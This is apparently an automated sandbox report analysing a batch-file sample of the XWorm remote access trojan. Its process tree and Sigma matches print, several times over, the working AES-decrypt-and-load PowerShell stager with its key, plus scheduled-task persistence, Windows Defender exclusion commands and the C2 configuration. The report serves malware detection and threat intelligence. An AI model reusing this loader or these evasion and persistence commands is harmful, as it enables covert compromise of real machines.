Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
startup_str_466.bat

Overview

General Information

Sample name:startup_str_466.bat
Analysis ID:1586186
MD5:0d686395e9e0766b138059e0333731df
SHA1:0b52ebd0540f20d542d14cce2167a6d4e219dba5
SHA256:67db2ef31f607b0ffe1f4e662526a64c356990b827ba31c3a7c4d6c5530a2d76
Tags:batHUNuser-smica83
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell decrypt and execute
Yara detected XWorm
.NET source code contains a sample name check
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Loading BitLocker PowerShell Module
Powershell drops PE file
Powershell is started from unusual location (likely to bypass HIPS)
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7280 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\startup_str_466.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7340 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_533_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_533.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7720 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_533.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • cmd.exe (PID: 7776 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_533.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7828 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_533.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_533.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 8040 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 6816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft Edge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Edge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 2028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 3912 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Roaming\Microsoft Edge.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 7640 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_533.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • Microsoft Edge.exe (PID: 7324 cmdline: "C:\Users\user\AppData\Roaming\Microsoft Edge.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["product-hack.gl.at.ply.gg"], "Port": 50751, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000009.00000002.3313915112.0000013CE7954000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000009.00000002.3313915112.0000013CE7954000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xfed98:$s6: VirtualBox
      • 0x1100c2:$s6: VirtualBox
      • 0x1380fa:$s6: VirtualBox
      • 0xfecfe:$s8: Win32_ComputerSystem
      • 0x110020:$s8: Win32_ComputerSystem
      • 0x138058:$s8: Win32_ComputerSystem
      • 0x1126ba:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x13a6f2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x112757:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x13a78f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x11286c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x13a8a4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x1114e5:$cnc4: POST / HTTP/1.1
      • 0x13951d:$cnc4: POST / HTTP/1.1
      00000009.00000002.2963252000.0000013CD9346000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000009.00000002.2963252000.0000013CD9346000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x62822:$s6: VirtualBox
        • 0x328:$s8: Win32_ComputerSystem
        • 0x62780:$s8: Win32_ComputerSystem
        • 0x77a00:$s8: Win32_ComputerSystem
        • 0x64e1a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x6fd1c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x64eb7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x6fdd4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x64fcc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x6ff04:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x63c45:$cnc4: POST / HTTP/1.1
        Click to see the 3 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        9.2.powershell.exe.13cd9398610.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
          9.2.powershell.exe.13cd9398610.0.raw.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0xeaea:$str01: $VB$Local_Port
          • 0xeb17:$str02: $VB$Local_Host
          • 0xc924:$str03: get_Jpeg
          • 0xd2a4:$str04: get_ServicePack
          • 0x10733:$str05: Select * from AntivirusProduct
          • 0x10dd9:$str06: PCRestart
          • 0x10ded:$str07: shutdown.exe /f /r /t 0
          • 0x10e9f:$str08: StopReport
          • 0x10e75:$str09: StopDDos
          • 0x10f6b:$str10: sendPlugin
          • 0x110eb:$str12: -ExecutionPolicy Bypass -File "
          • 0x1171a:$str13: Content-length: 5235
          9.2.powershell.exe.13cd9398610.0.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x10212:$s6: VirtualBox
          • 0x10170:$s8: Win32_ComputerSystem
          • 0x253f0:$s8: Win32_ComputerSystem
          • 0x1280a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x1d70c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x128a7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x1d7c4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x129bc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x1d8f4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x11635:$cnc4: POST / HTTP/1.1
          9.2.powershell.exe.13ce7acbf20.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
            9.2.powershell.exe.13ce7acbf20.2.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0xccea:$str01: $VB$Local_Port
            • 0xcd17:$str02: $VB$Local_Host
            • 0xab24:$str03: get_Jpeg
            • 0xb4a4:$str04: get_ServicePack
            • 0xe933:$str05: Select * from AntivirusProduct
            • 0xefd9:$str06: PCRestart
            • 0xefed:$str07: shutdown.exe /f /r /t 0
            • 0xf09f:$str08: StopReport
            • 0xf075:$str09: StopDDos
            • 0xf16b:$str10: sendPlugin
            • 0xf2eb:$str12: -ExecutionPolicy Bypass -File "
            • 0xf91a:$str13: Content-length: 5235
            Click to see the 26 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7340.amsi.csvJoeSecurity_PowershellDecryptAndExecuteYara detected Powershell decrypt and executeJoe Security
              amsi64_7340.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                amsi64_7828.amsi.csvJoeSecurity_PowershellDecryptAndExecuteYara detected Powershell decrypt and executeJoe Security
                  amsi64_7828.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
                    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispo
                    Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispo
                    Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
                    Source: File createdAuthor: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7828, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk
                    Sigma detected: Potentially Suspicious PowerShell Child Processes
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_533.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_533.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7340, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_533.vbs" , ProcessId: 7720, ProcessName: wscript.exe
